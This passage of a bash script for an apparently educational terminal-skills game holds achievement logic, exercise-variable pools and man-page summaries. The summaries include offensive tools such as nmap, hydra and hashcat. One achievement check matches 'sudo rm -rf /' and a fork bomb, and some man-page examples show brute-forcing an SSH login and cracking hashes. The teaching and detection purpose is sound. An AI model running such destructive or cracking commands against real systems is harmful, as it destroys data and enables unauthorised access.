  [flawless]="Beat a boss without a single mistake"
  [vimquit]="Try to :q! or :wq out of the game"
  [completionist]="Complete all scenarios"
)
_disk_found() {
  local name=$1
  [[ ",$DISKS_FOUND," == *",$name,"* ]] && return
  [[ -n "$DISKS_FOUND" ]] && DISKS_FOUND="$DISKS_FOUND,$name" || DISKS_FOUND="$name"
  _save_profile
  _csv_count "$DISKS_FOUND"; local disk_count=$REPLY
  printf '\n%s\n' "${Y}${B}▄▄▄▄▄▄▄${N}"
  printf '%s\n'   "${Y}${B}█ ░░░ █${N}  ${Y}${B}FLOPPY DISK: ${name}${N}"
  printf '%s\n'   "${Y}${B}█▄▄▄▄▄█${N}  ${D}${_DISK_DESC[$name]:-}${N}"
  printf '%s\n'   "${Y}${B}███████${N}  ${D}${disk_count}/${_DISK_TOTAL} collected${N}"
  printf '%s\n\n' "${Y}${B}▀▀▀▀▀▀▀${N}"
  sleep 5
}
_disk_check() {
  local trigger=$1 ctx=${2:-}
  case "$trigger" in
    wrong)
      [[ "$ctx" == "sudo rm -rf /"* ]] && _disk_found sudorm
      [[ "$ctx" == *":()"*":|:"* ]] && _disk_found forkbomb
      [[ "$ctx" == "man" ]] && _disk_found rtfm
      [[ "$ctx" == ":q"* || "$ctx" == ":wq"* ]] && _disk_found vimquit
      ;;
    streak) ((_S_STREAK >= 10)) && _disk_found streak10;;
    nightowl) local h; printf -v h '%(%H)T' -1; ((h < 4)) && _disk_found nightowl;;
    flawless) _disk_found flawless;;
    completionist)
      local i done=1
      for ((i=1; i<=SC_TOTAL; i++)); do
        [[ ",$SC_DONE," == *",$i,"* ]] || { done=0; break; }
      done
      ((done)) && _disk_found completionist
      ;;
  esac
}

# ═══ VARIABLE POOLS ═══
# shellcheck disable=SC2034  # pool arrays accessed via nameref (_fpick/_ctx)
{
SANDBOX_LOGS=(server.log app.log logs/access.log logs/error.log)
SANDBOX_TXTS=(notes.txt todo.txt)
SANDBOX_CSVS=(data.csv users.csv)
SANDBOX_CFGS=(config.ini settings.yaml)
SANDBOX_SCRIPTS=(backup.sh deploy.sh)
LOGS=(server.log app.log system.log auth.log access.log error.log debug.log nginx.log apache.log syslog
  messages kern.log daemon.log mail.log secure dpkg.log pacman.log audit.log boot.log faillog lastlog
  wtmp btmp cron.log yum.log dmesg)
CONFIGS=(config.ini settings.conf app.yaml server.conf nginx.conf httpd.conf my.cnf pg.conf
  redis.conf sshd_config sudoers fstab hosts resolv.conf profile bashrc vimrc tmux.conf gitconfig
  docker-compose.yml)
SCRIPTS=(backup.sh deploy.sh build.sh test.sh cleanup.sh migrate.sh sync.sh init.sh
  setup.sh install.sh update.sh monitor.sh healthcheck.sh rotate.sh fetch.sh push.sh start.sh stop.sh
  restart.sh validate.sh)
TXTS=(data.txt notes.txt output.txt report.txt dump.txt results.txt temp.txt
  readme.txt todo.txt changelog.txt manifest.txt inventory.txt urls.txt hosts.txt targets.txt)
CSVS=(data.csv users.csv logs.csv export.csv report.csv stats.csv
  metrics.csv transactions.csv inventory.csv orders.csv customers.csv events.csv)
BINS=(binary.exe program.elf app.bin firmware.bin malware.exe sample.bin
  payload.dll trojan.exe rootkit.so agent.bin dropper.exe beacon.bin)
IMGS=(disk.img backup.img system.img evidence.img
  memory.dmp vmcore.dmp hiberfil.sys pagefile.sys snapshot.raw forensic.dd)
PCAPS=(capture.pcap traffic.pcap network.pcap dump.pcap
  scan.pcap attack.pcap session.pcap handshake.pcap dns.pcap http.pcap)
HASHES=(hash.txt hashes.txt md5.txt sha256.txt passwd.txt shadow.txt
  ntlm.txt cracked.txt potfile.txt wordlist.hash lm.txt bcrypt.txt)
WORDLISTS=(wordlist.txt rockyou.txt passwords.txt dict.txt
  common.txt custom.txt leaked.txt company.txt names.txt cities.txt hybrid.txt rules.txt)
ARCHIVES=(backup.tar.gz archive.tar.gz files.tgz data.tar.bz2 export.zip
  snapshot.tar.xz bundle.tar release.tar.gz package.tar.gz source.tar.bz2 logs.tar.gz dump.tar.zst)
PHOTOS=(photo.jpg image.png screenshot.png evidence.jpg document.pdf
  scan.tiff capture.bmp diagram.svg icon.ico avatar.webp thumbnail.gif render.raw)
DIRS=(src lib bin tmp logs data config backup output cache
  build dist vendor node_modules target public static assets uploads downloads)
EXTS=(py js ts go rs c cpp java rb sh log txt conf yaml json
  toml md html css sql xml csv ini env php pl lua zig swift)
SEARCH_TERMS=(error warning panic fatal timeout exception failed invalid denied refused connection
  unauthorized forbidden crash segfault nullptr overflow leak abort reject throttle blocked suspend
  corrupt missing expired revoked)
USERNAMES=(admin root user guest test deploy www-data nginx postgres mysql
  git jenkins ansible prometheus grafana redis mongodb elastic backup operator service)
IPS=(10.0.0.1 10.0.0.5 10.10.10.10 192.168.1.1 192.168.1.100 172.16.0.1 10.0.0.50
  192.168.0.1 172.16.1.1 10.10.10.50 192.168.100.1 10.20.30.40 172.31.0.1 192.168.50.50 10.0.1.1)
SUBNETS=(10.0.0.0/24 192.168.1.0/24 172.16.0.0/16 10.10.10.0/24
  192.168.0.0/24 172.17.0.0/16 10.20.0.0/16 192.168.100.0/24 10.0.0.0/8 172.31.0.0/16)
PORTS=(22 80 443 8080 3000 5000 8000 3306 5432 6379 27017
  21 23 25 53 110 143 389 445 993 995 1433 1521 5900 8443)
MACS=(AA:BB:CC:DD:EE:FF 11:22:33:44:55:66 DE:AD:BE:EF:CA:FE
  00:11:22:33:44:55 A1:B2:C3:D4:E5:F6 12:34:56:78:9A:BC FE:DC:BA:98:76:54
  CA:FE:BA:BE:00:01 01:23:45:67:89:AB AB:CD:EF:12:34:56)
URLS=(http://10.0.0.1 http://192.168.1.100 http://target.local http://10.10.10.10
  http://192.168.0.1 http://172.16.1.1 http://dev.local http://staging.local
  http://app.local http://api.local http://admin.local http://internal.local)
FIELDS=(name id status email timestamp user_id created_at value count type
  updated_at deleted_at version priority level source target duration size)
JSON_KEYS=(data items results users records entries
  events messages logs errors nodes objects resources payload)
REPLACE_OLD=(foo old debug localhost http TODO FIXME tmp
  dev staging test alpha beta v1 deprecated warn error secret)
REPLACE_NEW=(bar new prod 10.0.0.1 https DONE RESOLVED cache
  main production live release stable v2 current info success masked)
SIZES=(1k 5k 10k 100k 500k 10M 50M 100M 500M 1G 2G 5G 10G)
HASHCAT_MODES=(0 100 1400 1800 3200 1000 5600 13100 18200 22000 500 1700 2500 5500 11300)
HASH_NAMES=(MD5 SHA1 SHA256 sha512crypt bcrypt NTLM NetNTLMv2 Kerberoast-TGS ASREPRoast WPA-PBKDF2 md5crypt SHA-512 WPA NetNTLMv1 Bitcoin)
INTERFACES=(eth0 wlan0 ens33 enp0s3 ens192 enp0s25 wlp2s0 docker0 br0 virbr0)
WIFI_INTERFACES=(wlan0 wlp2s0 wlp3s0 wlan1)
REMOTE_HOSTS=(server backup-host db-server web-server jump-host bastion
  prod-01 staging-01 dev-01 ci-runner build-server cache-01 redis-01 postgres-01 monitor)
PROCS=(nginx apache2 mysqld postgres redis-server mongod node python3 java ruby
  docker containerd systemd sshd cron cups NetworkManager pulseaudio pipewire)
SERVICES=(nginx apache2 mysql postgresql redis docker containerd sshd
  NetworkManager bluetooth cups cronie fail2ban ufw firewalld syncthing)
BRANCHES=(main master develop feature/auth feature/api fix/login hotfix/security release/v2)
}

# ═══ HELPERS ═══
_fpick() { local -n _a=$1; ((${#_a[@]})) || { REPLY=""; return 1; }; REPLY="${_a[$((RANDOM % ${#_a[@]}))]}"; }
_fphrase() { local -a _a=("$@"); REPLY="${_a[$((RANDOM % ${#_a[@]}))]}"; }
_frnum() { REPLY=$(($1 + RANDOM % ($2 - $1 + 1))); }
# Fisher-Yates in-place shuffle via nameref (replaces shuf fork)
# shellcheck disable=SC2178  # nameref pattern — _a is always an array
_fshuffle() { local -n _a=$1; local i j t; for ((i=${#_a[@]}-1; i>0; i--)); do j=$((RANDOM % (i+1))); t="${_a[$i]}"; _a[$i]="${_a[$j]}"; _a[$j]="$t"; done; }
# shellcheck disable=SC2178
_fshuffle_n() { _fshuffle "$1"; local -n _a=$1; (($2 < ${#_a[@]})) && _a=("${_a[@]:0:$2}"); }
_pause() { read -rsp "${D}Press Enter to ${1:-continue}...${N}"; }

_QV='log cfg cfg2 txt txt2 csv dir dir2 ext ext2 script archive bin img pcap hash photo wordlist ip subnet port port2 mac url user host term term2 term3 field key old new size iface proc svc branch n n1 n2 n3 col'
# shellcheck disable=SC2034  # vars consumed by caller's eval scope
_ctx() {
  _fpick LOGS; log=$REPLY; _fpick CONFIGS; cfg=$REPLY; _fpick CONFIGS; cfg2=$REPLY
  _fpick TXTS; txt=$REPLY; _fpick TXTS; txt2=$REPLY; _fpick CSVS; csv=$REPLY
  _fpick DIRS; dir=$REPLY; _fpick DIRS; dir2=$REPLY; _fpick EXTS; ext=$REPLY; _fpick EXTS; ext2=$REPLY
  _fpick SCRIPTS; script=$REPLY; _fpick ARCHIVES; archive=$REPLY; _fpick BINS; bin=$REPLY
  _fpick IMGS; img=$REPLY; _fpick PCAPS; pcap=$REPLY; _fpick HASHES; hash=$REPLY; _fpick PHOTOS; photo=$REPLY
  _fpick WORDLISTS; wordlist=$REPLY; _fpick IPS; ip=$REPLY; _fpick SUBNETS; subnet=$REPLY
  _fpick PORTS; port=$REPLY; _fpick PORTS; port2=$REPLY; _fpick MACS; mac=$REPLY
  _fpick URLS; url=$REPLY; _fpick USERNAMES; user=$REPLY; _fpick REMOTE_HOSTS; host=$REPLY
  _fpick SEARCH_TERMS; term=$REPLY; _fpick SEARCH_TERMS; term2=$REPLY; _fpick SEARCH_TERMS; term3=$REPLY
  _fpick FIELDS; field=$REPLY; _fpick JSON_KEYS; key=$REPLY
  _fpick REPLACE_OLD; old=$REPLY; _fpick REPLACE_NEW; new=$REPLY; _fpick SIZES; size=$REPLY
  _fpick INTERFACES; iface=$REPLY; _fpick PROCS; proc=$REPLY; _fpick SERVICES; svc=$REPLY
  _fpick BRANCHES; branch=$REPLY
  _frnum 1 20; n1=$REPLY; _frnum 5 50; n2=$REPLY; _frnum 2 10; n3=$REPLY; _frnum 1 5; col=$REPLY; n=$n1
}

# ═══ MANPAGES & EXP ═══
# Each entry: header\nbody lines (already formatted with escape codes)
declare -A MANPAGE=(
  [cd]=$'change directory\n  \e[32m.\e[0m         current directory      \e[32m..\e[0m        parent directory\n  \e[32m~\e[0m         home directory         \e[32m-\e[0m         previous directory\n  \e[32m../..\e[0m     up two levels'
  [echo]=$'print text to stdout\n  \e[36m-n\e[0m        no trailing newline    \e[36m-e\e[0m        enable escapes (\\n \\t)\n  \e[33m"$VAR"\e[0m    expands variables      \e[33m\x27text\x27\e[0m   literal (no expansion)\n  \e[2mecho hello    echo "$HOME"    echo -n "no newline"    echo -e "line1\\nline2"\e[0m'
  [pwd]=$'print working directory\n  shows absolute path of current directory\n  \e[2mpwd    # /home/user/projects\e[0m'
  [touch]=$'create empty file or update timestamp\n  \e[36m-t\e[0m \e[33mSTAMP\e[0m  set specific time\n  \e[2mtouch newfile    touch -t 202301010000 file\e[0m'
  [mv]=$'move or rename files\n  \e[36m-i\e[0m        confirm before overwrite\n  \e[36m-n\e[0m        never overwrite\n  \e[2mmv old.txt new.txt    mv file.txt dir/    mv *.log archive/\e[0m'
  [rm]=$'delete files permanently\n  \e[36m-r\e[0m        recursive (dirs)       \e[36m-f\e[0m        force (no prompt)\n  \e[36m-i\e[0m        confirm each file\n  \e[2mrm file.txt    rm -r dir/    rm -rf dir/    rm -i *.log\e[0m'
  [ln]=$'create links\n  \e[36m-s\e[0m        symbolic (soft) link   \e[2m(without -s: hard link)\e[0m\n  \e[35mhard\e[0m      same inode, same disk  \e[35msoft\e[0m      path pointer, cross-disk\n  \e[2mln file hardlink    ln -s target symlink    ln -sf target link\e[0m'
  [test]=$'evaluate conditional expression\n  \e[36m-f\e[0m \e[33mFILE\e[0m   is regular file        \e[36m-d\e[0m \e[33mFILE\e[0m   is directory\n  \e[36m-e\e[0m \e[33mFILE\e[0m   exists                 \e[36m-r\e[0m \e[33mFILE\e[0m   is readable\n  \e[36m-z\e[0m \e[33mSTR\e[0m    string is empty        \e[36m-n\e[0m \e[33mSTR\e[0m    string not empty\n  \e[36m-eq\e[0m       equal (numeric)        \e[36m-lt\e[0m       less than\n  \e[36m-gt\e[0m       greater than           \e[36m-ne\e[0m       not equal\n  \e[2m[[ -f file ]] && echo yes    [[ -z "$var" ]]    [[ $a -eq $b ]]\e[0m'
  [ls]=$'list directory contents\n  \e[36m-l\e[0m        details (permissions, owner, size, date)\n  \e[36m-a\e[0m        show hidden            \e[36m-h\e[0m        human sizes\n  \e[36m-S\e[0m        sort by size           \e[36m-t\e[0m        sort by time\n  \e[36m-d\e[0m        dirs themselves        \e[36m-R\e[0m        recursive\n  \e[36m-1\e[0m        one per line\n  \e[2mls -la    ls -lh    ls -lS    ls -lt    ls -d */\e[0m'
  [cat]=$'concatenate and print files\n  \e[36m-n\e[0m        number all lines\n  \e[35mvs less\e[0m   cat dumps everything at once (good for short files, piping)\n          less lets you scroll (good for long files)\n  \e[2mcat file.txt    cat -n file.txt    cat a.txt b.txt > merged.txt\e[0m'
  [head]=$'output first part of files\n  \e[36m-n\e[0m \e[33mN\e[0m      first \e[33mN\e[0m lines \e[2m(or head -N)\e[0m\n  \e[2mhead file.txt    head -n 5 file.txt    head -20 file.txt\e[0m'
  [tail]=$'output last part of files\n  \e[36m-n\e[0m \e[33mN\e[0m      last \e[33mN\e[0m lines           \e[36m-f\e[0m        follow (live updates)\n  \e[2mtail file.txt    tail -n 20 file.txt    tail -f /var/log/syslog\e[0m'
  [less]=$'pager (scroll through files)\n  \e[36m-N\e[0m        show line numbers\n  \e[2mless file.txt    less -N file.txt\e[0m'
  [cp]=$'copy files\n  \e[36m-r\e[0m        recursive (dirs)       \e[36m-a\e[0m        archive (preserve all)\n  \e[2mcp file.txt backup.txt    cp -r dir/ newdir/    cp -a dir/ newdir/\e[0m'
  [mkdir]=$'make directories\n  \e[36m-p\e[0m        create parents\n  \e[2mmkdir newdir    mkdir -p path/to/dir\e[0m'
  [tree]=$'directory tree\n  \e[36m-L\e[0m \e[33mN\e[0m      depth limit\n  \e[2mtree    tree -L 2\e[0m'
  [tee]=$'copy stdin to file AND stdout\n  \e[36m-a\e[0m        append (don\x27t overwrite)\n  \e[35mvs >>\e[0m     >> sends to file only (terminal goes dark)\n          tee sends to file AND keeps output on screen\n  \e[2mecho hello | tee file.txt    ls | tee -a log.txt\e[0m'
  [grep]=$'search text patterns\n  \e[36m-r\e[0m        recursive              \e[36m-i\e[0m        ignore case\n  \e[36m-n\e[0m        line numbers           \e[36m-c\e[0m        count matches\n  \e[36m-l\e[0m        files only             \e[36m-v\e[0m        invert match\n  \e[36m-o\e[0m        matched text only      \e[36m-q\e[0m        quiet (exit code)\n  \e[36m-w\e[0m        whole word             \e[36m-x\e[0m        whole line\n  \e[36m-E\e[0m        extended regex \e[2m(+?|)\e[0m   \e[36m-P\e[0m        perl regex \e[2m(\\d \\w lookahead)\e[0m\n  \e[36m-F\e[0m        literal string         \e[36m-f\e[0m \e[33mFILE\e[0m   patterns from file\n  \e[36m-A\e[0m \e[33mN\e[0m      lines after            \e[36m-B\e[0m \e[33mN\e[0m      lines before\n  \e[36m-m\e[0m \e[33mN\e[0m      max matches            \e[36m-C\e[0m \e[33mN\e[0m      context lines\n  \e[36m--include\e[0m  file pattern          \e[36m--exclude-dir\e[0m  skip directory\n  \e[35mvs rg\e[0m     grep is POSIX (everywhere). rg is faster, skips .gitignore,\n          recurses by default. use grep for portability, rg for speed\n  \e[2mgrep -rn TODO .    grep -ri pattern file    grep -oE \'[0-9]+\' log\e[0m'
  [rg]=$'fast grep (ripgrep)\n  \e[36m-i\e[0m        ignore case            \e[36m-v\e[0m        invert match\n  \e[36m-n\e[0m        line numbers           \e[36m-c\e[0m        count matches\n  \e[36m-l\e[0m        files only             \e[36m-o\e[0m        matched text only\n  \e[36m-q\e[0m        quiet (exit code)      \e[36m-w\e[0m        whole word\n  \e[36m-x\e[0m        whole line             \e[36m-F\e[0m        literal string\n  \e[36m-f\e[0m \e[33mFILE\e[0m   patterns from file     \e[36m-t\e[0m \e[33mTYPE\e[0m   file type filter\n  \e[36m-g\e[0m \e[33mGLOB\e[0m   file glob filter       \e[36m-m\e[0m \e[33mN\e[0m      max matches\n  \e[36m-A\e[0m \e[33mN\e[0m      lines after            \e[36m-B\e[0m \e[33mN\e[0m      lines before\n  \e[36m-C\e[0m \e[33mN\e[0m      context lines\n  \e[35mvs grep\e[0m   rg is faster, recursive by default, skips .gitignore.\n          grep is POSIX (works on any machine). use rg locally, grep in scripts\n  \e[2mrg pattern    rg -i todo    rg -t py import    rg -l error\e[0m'
  [find]=$'search for files\n  \e[36m-name\e[0m \e[33m\'X\'\e[0m   filename             \e[36m-iname\e[0m     case-insensitive\n  \e[36m-type\e[0m \e[2mf/d/l\e[0m  file type           \e[36m-size\e[0m \e[2m+10M\e[0m  by size\n  \e[36m-mtime\e[0m \e[2m-7\e[0m   modified days        \e[36m-mmin\e[0m \e[2m-60\e[0m   modified mins\n  \e[36m-amin\e[0m \e[2m-60\e[0m   accessed mins        \e[36m-empty\e[0m     empty files\n  \e[36m-executable\e[0m    has exec bit      \e[36m-perm\e[0m \e[2m-4000\e[0m by permission\n  \e[36m-maxdepth\e[0m \e[33mN\e[0m   limit depth        \e[36m-path\e[0m \e[33m\'X\'\e[0m   match path\n  \e[36m-not\e[0m          negate             \e[36m-print0\e[0m    null delimit\n  \e[36m-exec\e[0m \e[33mCMD\e[0m \e[32m{} \\;\e[0m  run per file  \e[36m-exec\e[0m \e[33mCMD\e[0m \e[32m{} +\e[0m   batch (faster)\n  \e[36m-delete\e[0m        remove\n  \e[35mvs fd\e[0m     find is POSIX (everywhere, complex predicates). fd is faster,\n          uses regex, skips .gitignore. use find for scripts, fd for speed\n  \e[2mfind . -name "*.log"    find / -size +100M    find . -type f -empty\e[0m'
  [fd]=$'fast find\n  \e[36m-e\e[0m \e[33mEXT\e[0m    file extension         \e[36m-t\e[0m \e[33mTYPE\e[0m   f/d/l/x/e\n  \e[36m-d\e[0m \e[33mN\e[0m      max depth              \e[36m-E\e[0m \e[33mPAT\e[0m    exclude pattern\n  \e[36m-H\e[0m        include hidden         \e[36m-i\e[0m        ignore case\n  \e[36m-S\e[0m \e[33mSIZE\e[0m   by size (+/-N)         \e[36m-l\e[0m        long listing\n  \e[36m-p\e[0m        match full path        \e[36m-g\e[0m        glob pattern\n  \e[36m-x\e[0m \e[33mCMD\e[0m    execute per result\n  \e[36m--changed-within\e[0m \e[33mT\e[0m               \e[36m--changed-before\e[0m \e[33mT\e[0m\n  \e[35mvs find\e[0m   fd is faster, regex by default, skips .gitignore + hidden.\n          find is POSIX (works anywhere), has -exec {} +, -delete, complex logic\n  \e[2mfd pattern    fd -e py    fd -t d    fd -S +10M    fd -x rm {}\e[0m'
  [sort]=$'sort lines of text\n  \e[36m-n\e[0m        numeric                \e[36m-r\e[0m        reverse\n  \e[36m-u\e[0m        unique                 \e[36m-k\e[0m \e[33mN\e[0m      by column \e[33mN\e[0m\n  \e[36m-t\e[0m \e[33mC\e[0m      delimiter              \e[36m-h\e[0m        human numeric\n  \e[36m-f\e[0m        ignore case\n  \e[2msort file.txt    sort -n nums.txt    sort -t, -k2 data.csv\e[0m'
  [uniq]=$'filter repeated lines\n  \e[36m-c\e[0m        count occurrences      \e[36m-d\e[0m        only duplicates\n  \e[36m-u\e[0m        only unique            \e[36m-D\e[0m        all duplicates\n  \e[35mvs sort -u\e[0m sort -u just deduplicates. uniq can COUNT (-c), show\n          ONLY dupes (-d), or ONLY unique (-u). that\'s why both exist\n  \e[2msort file | uniq    sort file | uniq -c    sort file | uniq -D\e[0m'
  [cut]=$'extract columns/fields\n  \e[36m-d\e[33mC\e[0m       delimiter              \e[36m-f\e[33mN\e[0m       field \e[33mN\e[0m\n  \e[36m-c\e[33mN\e[0m       character \e[33mN\e[0m            \e[36m--complement\e[0m invert\n  \e[35mvs awk\e[0m    cut is simpler/faster for grabbing columns.\n          awk is a full language — use it when you need math, conditions, or logic\n  \e[2mcut -d, -f1 data.csv    cut -d: -f1 /etc/passwd    cut -c1-10 file\e[0m'
  [wc]=$'word, line, byte count\n  \e[36m-l\e[0m        lines                  \e[36m-w\e[0m        words\n  \e[36m-c\e[0m        bytes                  \e[36m-m\e[0m        characters\n  \e[2mwc -l file.txt    wc -w file.txt    ls | wc -l\e[0m'
  [tr]=$'translate characters\n  \e[36m-d\e[0m        delete chars           \e[36m-s\e[0m        squeeze consecutive dupes to one\n  \e[32m<\e[0m \e[33mFILE\e[0m   tr reads stdin — redirect from file\n  \e[2mtr a-z A-Z < file    tr -d \'\\n\' < file    tr -s \' \' < file\e[0m'
  [sed]=$'stream editor\n  \e[31m\'s/old/new/\'\e[0m    replace first     \e[31m\'s/old/new/g\'\e[0m  replace all\n  \e[36m-i\e[0m            edit in place     \e[31m\'/pat/d\'\e[0m       delete lines\n  \e[36m-n\e[0m            suppress output  \e[36m-e\e[0m            multi commands\n  \e[36m-E\e[0m            extended regex\n  \e[35mvs awk\e[0m        sed is best for search-and-replace and line filtering.\n              awk is best for column-based processing and math\n  \e[2msed \'s/foo/bar/g\' file    sed -i \'/^#/d\' file    sed -n \'5,10p\' file\e[0m'
  [awk]=$'pattern scanning\n  \e[31m\'{print $1}\'\e[0m   first field       \e[31m\'{print $NF}\'\e[0m  last field\n  \e[36m-F\e[0m\e[2m\',\'\e[0m          delimiter       \e[31mNR\e[0m          line number\n  \e[2mawk \'{print $1}\' file    awk -F, \'{print $2}\' data.csv    awk \'/error/\' log\e[0m'
  [xargs]=$'build commands from stdin\n  \e[36m-I\e[0m \e[32m{}\e[0m     placeholder            \e[36m-0\e[0m        null delim\n  \e[36m-n\e[0m \e[33mN\e[0m      args per command       \e[36m-P\e[0m \e[33mN\e[0m      parallel\n  \e[36m-p\e[0m        confirm each           \e[36m-t\e[0m        trace (show cmd)\n  \e[2mfind . -print0 | xargs -0 rm    cat urls | xargs -P4 -I{} curl {}\e[0m'
  [tar]=$'archive tool\n  \e[36m-c\e[0m create   \e[36m-x\e[0m extract   \e[36m-t\e[0m list     \e[36m-f\e[0m \e[33mFILE\e[0m\n  \e[36m-z\e[0m gzip     \e[36m-C\e[0m \e[33mDIR\e[0m       extract to\n  \e[2mtar czf archive.tar.gz dir/    tar xzf archive.tar.gz    tar tf archive.tar.gz\e[0m'
  [chmod]=$'change file permissions\n  \e[32m+x\e[0m        add execute            \e[32m755\e[0m       rwxr-xr-x\n  \e[32m644\e[0m       rw-r--r--              \e[32mg+w\e[0m       group write\n  \e[36m-R\e[0m        recursive              \e[36m--reference\e[0m=\e[33mFILE\e[0m copy perms\n  \e[2mchmod +x script.sh    chmod 755 script.sh    chmod -R a+r dir/\e[0m'
  [ps]=$'list processes\n  \e[32maux\e[0m       all users, detailed    \e[36m--sort\e[0m=\e[33mFIELD\e[0m sort by field\n  \e[2mps aux    ps aux --sort=-%mem | head    ps auxf\e[0m'
  [du]=$'disk usage\n  \e[36m-h\e[0m        human readable         \e[36m-s\e[0m        summary only\n  \e[2mdu -sh .    du -sh */\e[0m'
  [df]=$'disk free space\n  \e[36m-h\e[0m        human readable\n  \e[2mdf -h    df -h /home\e[0m'
  [ssh]=$'secure shell\n  \e[36m-L\e[0m \e[2mP:H:P\e[0m  local forward          \e[36m-R\e[0m \e[2mP:H:P\e[0m  remote forward\n  \e[36m-D\e[0m \e[33mPORT\e[0m   SOCKS proxy            \e[36m-J\e[0m \e[33mHOST\e[0m   jump host\n  \e[36m-N\e[0m        no command             \e[36m-f\e[0m        background\n  \e[36m-T\e[0m        no tty\n  \e[2mssh user@host    ssh -L 8080:localhost:80 host    ssh -D 1080 host\e[0m'
  [curl]=$'HTTP client\n  \e[36m-X\e[0m \e[33mMETHOD\e[0m  GET/POST/PUT/DELETE   \e[36m-H\e[0m \e[2m\'K: V\'\e[0m  header\n  \e[36m-d\e[0m \e[33mDATA\e[0m    POST body             \e[36m-o\e[0m \e[33mFILE\e[0m   output file\n  \e[36m-L\e[0m         follow redirects      \e[36m-s\e[0m        silent\n  \e[36m-i\e[0m         show headers          \e[36m-O\e[0m        save original name\n  \e[35mvs wget\e[0m     curl is for APIs (headers, POST, methods).\n              wget is for downloading files (auto-resume, recursive mirror)\n  \e[2mcurl -s url    curl -X POST -d "data" url    curl -O url/file.tar.gz\e[0m'
  [wget]=$'file downloader\n  \e[36m-c\e[0m        continue download      \e[36m-m\e[0m        mirror site\n  \e[36m-k\e[0m        convert links\n  \e[35mvs curl\e[0m    wget is for downloading files (auto-resume, recursive).\n          curl is for API work (headers, POST, methods)\n  \e[2mwget url    wget -c url    wget -mk url\e[0m'
  [git]=$'version control\n  \e[32madd\e[0m     stage      \e[32mcommit\e[0m  save       \e[32mpush\e[0m    upload\n  \e[32mpull\e[0m    download   \e[32mstatus\e[0m  changes    \e[32mdiff\e[0m    compare\n  \e[32mlog\e[0m     history    \e[32mbranch\e[0m  branches   \e[32mmerge\e[0m   combine\n  \e[32mrebase\e[0m  replay     \e[32mstash\e[0m   shelve     \e[32mreset\e[0m   undo\n  \e[2mgit add .    git commit -m "msg"    git log --oneline    git stash\e[0m'
  [ss]=$'socket statistics\n  \e[36m-t\e[0m        TCP                    \e[36m-u\e[0m        UDP\n  \e[36m-l\e[0m        listening              \e[36m-n\e[0m        numeric ports\n  \e[36m-p\e[0m        show process           \e[36m-a\e[0m        all sockets\n  \e[35mvs netstat\e[0m ss is faster and the modern replacement.\n          netstat is deprecated but still on older systems\n  \e[2mss -tlnp    ss -tunap    ss -t state established\e[0m'
  [systemctl]=$'systemd control\n  \e[32mstart\e[0m     start service          \e[32mstop\e[0m      stop service\n  \e[32menable\e[0m    start on boot          \e[32mdisable\e[0m   no auto-start\n  \e[32mstatus\e[0m    show status            \e[32mrestart\e[0m   restart service\n  \e[32mreload\e[0m    reload config          \e[32mmask\e[0m      prevent starting\n  \e[32mdaemon-reload\e[0m  reload unit files  \e[36m--failed\e[0m  show failures\n  \e[2msystemctl status nginx    systemctl enable sshd    systemctl --failed\e[0m'
  [journalctl]=$'systemd logs\n  \e[36m-u\e[0m \e[33mUNIT\e[0m   service logs           \e[36m-f\e[0m        follow live\n  \e[36m-n\e[0m \e[33mN\e[0m      last \e[33mN\e[0m lines           \e[36m-b\e[0m        current boot\n  \e[36m-p\e[0m \e[33mLEVEL\e[0m  priority (err/warn)    \e[36m-k\e[0m        kernel messages\n  \e[36m-o\e[0m \e[33mFMT\e[0m    output format          \e[36m--since\e[0m   time filter\n  \e[36m--disk-usage\e[0m   journal size      \e[36m--vacuum-size\e[0m=\e[33mN\e[0m  shrink to\n  \e[36m--no-pager\e[0m     no less/more\n  \e[35mvs dmesg\e[0m  journalctl indexes all system logs (structured, filterable).\n          dmesg is kernel ring buffer only\n  \e[2mjournalctl -u nginx -f    journalctl -b -p err    journalctl --disk-usage\e[0m'
  [crontab]=$'scheduled tasks\n  \e[36m-e\e[0m        edit crontab           \e[36m-l\e[0m        list jobs\n  \e[36m-r\e[0m        remove all jobs\n  \e[2mcrontab -e    crontab -l    sudo crontab -e\e[0m'
  [tmux]=$'terminal multiplexer\n  \e[32mnew\e[0m \e[36m-s\e[0m \e[33mNAME\e[0m   new session     \e[32mattach\e[0m \e[36m-t\e[0m \e[33mNAME\e[0m  reattach\n  \e[32mls\e[0m              list sessions   \e[32mkill-session\e[0m \e[36m-t\e[0m \e[33mNAME\e[0m\n  \e[2mtmux new -s work    tmux attach -t work    tmux ls\e[0m'
  [nmap]=$'network scanner\n  \e[36m-sS\e[0m       SYN (half-open)        \e[36m-sT\e[0m       TCP connect\n  \e[36m-sU\e[0m       UDP scan               \e[36m-sV\e[0m       version detect\n  \e[36m-sC\e[0m       default scripts        \e[36m-O\e[0m        OS detection\n  \e[36m-A\e[0m        aggressive (all)       \e[36m-F\e[0m        fast (top 100)\n  \e[36m-p\e[0m \e[33mPORTS\e[0m  specific ports         \e[36m-p-\e[0m       all 65535 ports\n  \e[36m-Pn\e[0m       skip discovery         \e[36m-sn\e[0m       ping sweep\n  \e[36m-sL\e[0m       list targets           \e[36m-PR\e[0m       ARP scan\n  \e[36m-oA\e[0m \e[33mPFX\e[0m   all output formats     \e[36m-oG\e[0m \e[33mFILE\e[0m  greppable output\n  \e[36m-T1\e[0m       slow (evasion)         \e[36m-T4\e[0m       fast timing\n  \e[36m--top-ports\e[0m \e[33mN\e[0m  top N ports       \e[36m--script\e[0m \e[33mNAME\e[0m  NSE script\n  \e[2mnmap -sV -sC host    nmap -A -p- host    nmap -sn 192.168.1.0/24\e[0m'
  [hydra]=$'network login cracker\n  \e[36m-l\e[0m \e[33mUSER\e[0m   single username        \e[36m-L\e[0m \e[33mFILE\e[0m   username list\n  \e[36m-P\e[0m \e[33mFILE\e[0m   password list          \e[36m-t\e[0m \e[33mN\e[0m      threads per target\n  \e[2mhydra -l admin -P pass.txt ssh://192.168.1.1\e[0m'
  [hashcat]=$'GPU hash cracker\n  \e[36m-m\e[0m \e[33mTYPE\e[0m   hash type \e[2m(0=MD5 100=SHA1 1000=NTLM 1800=sha512crypt)\e[0m\n  \e[36m-a\e[0m \e[33mMODE\e[0m   0=dict 3=brute         \e[36m--show\e[0m   show cracked\n  \e[36m-r\e[0m \e[33mFILE\e[0m   rules file             \e[36m--restore\e[0m resume session\n  \e[35mvs john\e[0m   hashcat uses GPU (fast for large lists).\n          john is CPU-based, better auto-format detection\n  \e[2mhashcat -m 0 hash.txt wordlist.txt    hashcat -m 1000 -a 3 hash ?a?a?a?a\e[0m'
